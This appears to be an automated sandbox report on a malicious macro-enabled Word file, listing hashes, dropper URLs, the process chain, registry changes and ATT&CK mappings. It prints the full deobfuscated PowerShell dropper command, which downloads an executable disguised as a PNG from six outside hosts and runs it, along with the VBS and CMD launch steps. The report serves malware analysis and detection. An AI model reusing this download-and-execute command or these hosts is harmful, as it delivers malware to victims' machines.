d8a7d0dfb3835974e441cb2bd9af7a13aa323e5de8a29c7e9eecf4632d5ecd04

General

Target

13_08_2020_62967988.docm
Size

381KB
MD5

3d52b1e551984e203f02d9dcbd8e7e8b
SHA1

369dbac4370c025651892ce036dbfd82fbbb4ef2
SHA256

37a4488c88924394c225a530ace9dc09a4507d913bea46c49ce14ff43b40f6b8
SHA512

7ad63084e0c51727866c784b31bf3a77ea68b28b061327b2e8f8e39e6e2834f77aa69a9922294ca362fa5b4b695762e9fa3c28b1bf2584be9611102e21008e53

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://podosenengk12.com/rtjyw/555555.png

exe.dropper

http://accent-granit.com/urjikh/555555.png

exe.dropper

http://wisedata.technology/xhpcvntvdmj/555555.png

exe.dropper

http://kahnamoei.com/vatopbv/555555.png

exe.dropper

http://carpalette-hachinohe.com/pdfdxenf/555555.png

exe.dropper

http://jung-versand.net/dbjqzkp/555555.png

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

explorer.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1708	1880	explorer.exe	WINWORD.EXE

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exe

flow	pid	process
6	1528	powershell.exe
7	1528	powershell.exe
8	1528	powershell.exe
10	1528	powershell.exe
12	1528	powershell.exe
16	1528	powershell.exe
17	1528	powershell.exe
18	1528	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

604 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1984 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
604	timeout.exe

pid	process
1984	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{43D5AE92-4332-477C-8883-E0B3B063C5D2}\ = "IWMPWindow"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\TypeLib\{AE6B4DD8-82B4-4291-B5F2-76E139190F8E}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2BA0C533-1D9B-47EB-B4DF-929F9589A9C3}\ = "IOutlookExchangeRibbon"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B80BC789-6C08-4261-AC0F-55FA3D003E58}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AE6B4DD8-82B4-4291-B5F2-76E139190F8E}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8CEA03A2-D0C5-4E97-9C38-A676A639A51D}\ = "IWMPSkinList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C36063D-929E-405A-B6D0-0724AE8C6CC9}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AE6B4DD8-82B4-4291-B5F2-76E139190F8E}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C36063D-929E-405A-B6D0-0724AE8C6CC9}\1.0\ = "Windows Media Player"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3691D6C-A96D-48BE-8A62-192A3D34BAF0}\ = "IButtonBar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C36063D-929E-405A-B6D0-0724AE8C6CC9}\1.0	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B80BC789-6C08-4261-AC0F-55FA3D003E58}\ = "_IRoomsCTPEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1880 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1528 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1984 taskkill.exe
Token: SeDebugPrivilege 1528 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1880 WINWORD.EXE
1880 WINWORD.EXE

pid	process
1880	WINWORD.EXE

pid	process
1528	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1528	powershell.exe

pid	process
1880	WINWORD.EXE
1880	WINWORD.EXE

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WINWORD.EXEexplorer.exeWScript.execmd.exe

description	pid	process	target process
PID 1880 wrote to memory of 1708	1880	WINWORD.EXE	explorer.exe
PID 1880 wrote to memory of 1708	1880	WINWORD.EXE	explorer.exe
PID 1880 wrote to memory of 1708	1880	WINWORD.EXE	explorer.exe
PID 1880 wrote to memory of 1708	1880	WINWORD.EXE	explorer.exe
PID 1960 wrote to memory of 268	1960	explorer.exe	WScript.exe
PID 1960 wrote to memory of 268	1960	explorer.exe	WScript.exe
PID 1960 wrote to memory of 268	1960	explorer.exe	WScript.exe
PID 268 wrote to memory of 1556	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 1556	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 1556	268	WScript.exe	cmd.exe
PID 1556 wrote to memory of 1984	1556	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 1984	1556	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 1984	1556	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 1528	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1528	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1528	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 604	1556	cmd.exe	timeout.exe
PID 1556 wrote to memory of 604	1556	cmd.exe	timeout.exe
PID 1556 wrote to memory of 604	1556	cmd.exe	timeout.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\13_08_2020_62967988.docm"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\SysWOW64\explorer.exe
explorer.exe C:\ProgramData\Portes.vbs
2⤵
- Process spawned unexpected child process
PID:1708

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\System32\cmd.exe
cmd /c ""C:\Nipo_Bik\Jorticks.cmd" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\system32\taskkill.exe
Taskkill /IM "winword.exe" /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWerShell Foreach($url in @('http://podosenengk12.com/rtjyw/555555.png','http://accent-granit.com/urjikh/555555.png','http://wisedata.technology/xhpcvntvdmj/555555.png','http://kahnamoei.com/vatopbv/555555.png','http://carpalette-hachinohe.com/pdfdxenf/555555.png','http://jung-versand.net/dbjqzkp/555555.png')) { try{$path = 'C:\Nipo_Bik\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
4⤵
- Delays execution with timeout.exe
PID:604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Nipo_Bik\Jorticks.cmd
Filesize
5KB

MD5
a0b5cf22bd560df98fbf461a798ec8b7

SHA1
e3d2a155cbeeefb366f9f872f1486f4c0016bc29

SHA256
a1a58a129f0893b4cdf8dec2616e00727a1d247d13fbcf0b9f1ca573a5aa4ccb

SHA512
f7972aad3d643c243ebabba26fc769ed17c68a0dd2d12b1cfddce80014e857b501b3f27118a3aa06565c5b984a82f65a1a4dfa9333f4020a7b7cea5b9c437947

Download Submit
C:\ProgramData\Kerpok.vbs
Filesize
1008B

MD5
75b9911265592c7b70e5cc29bc065b61

SHA1
0a54d7d0923e80e37448e31ae9481e860318be6c

SHA256
26c6a8e9ae7ce442c94e85ead16f2fa1d733fa0a917a5e40ca03bf1b2973ac50

SHA512
f2d2096ad1f4a5b9c661130fd66cdac1a4d451889a035cfc89527d8cdd41e6bcc8b83585a80210c61b65e13ee8f2cfa108c3c14cdc36f429b1160d7b4c2050dc

Download Submit
C:\ProgramData\Portes.vbs
Filesize
68KB

MD5
dc1b5ee521257fc500fefc81e88ccb9d

SHA1
42c9a2009e1fcae7de8cb50bd62fb3527b826cf9

SHA256
02c28308ba9e17827cabb90d9c92684658c01a52ac90106555e8d46e7fe9f696

SHA512
33c4dd9bf6afd01e822cadb08b4dd4bed8a7714ca68f342fdcfca345dfa3eb2fd0b5a4ccef70844d93e76eb7da549995ff98e9969e78b147c383bcbf92c24290

Download Submit
memory/268-64-0x0000000000000000-mapping.dmp

Download
memory/604-75-0x0000000000000000-mapping.dmp

Download
memory/1528-74-0x000000000256B000-0x000000000258A000-memory.dmp

Filesize
124KB

Download
memory/1528-72-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmp

Filesize
11.4MB

Download
memory/1528-73-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/1528-70-0x0000000000000000-mapping.dmp

Download
memory/1556-67-0x0000000000000000-mapping.dmp

Download
memory/1708-59-0x0000000000000000-mapping.dmp

Download
memory/1708-61-0x000000006AA01000-0x000000006AA03000-memory.dmp

Filesize
8KB

Download
memory/1880-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1880-54-0x0000000072201000-0x0000000072204000-memory.dmp

Filesize
12KB

Download
memory/1880-58-0x0000000070C6D000-0x0000000070C78000-memory.dmp

Filesize
44KB

Download
memory/1880-57-0x00000000755A1000-0x00000000755A3000-memory.dmp

Filesize
8KB

Download
memory/1880-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1880-55-0x000000006FC81000-0x000000006FC83000-memory.dmp

Filesize
8KB

Download
memory/1960-62-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

Filesize
8KB

Download
memory/1984-69-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads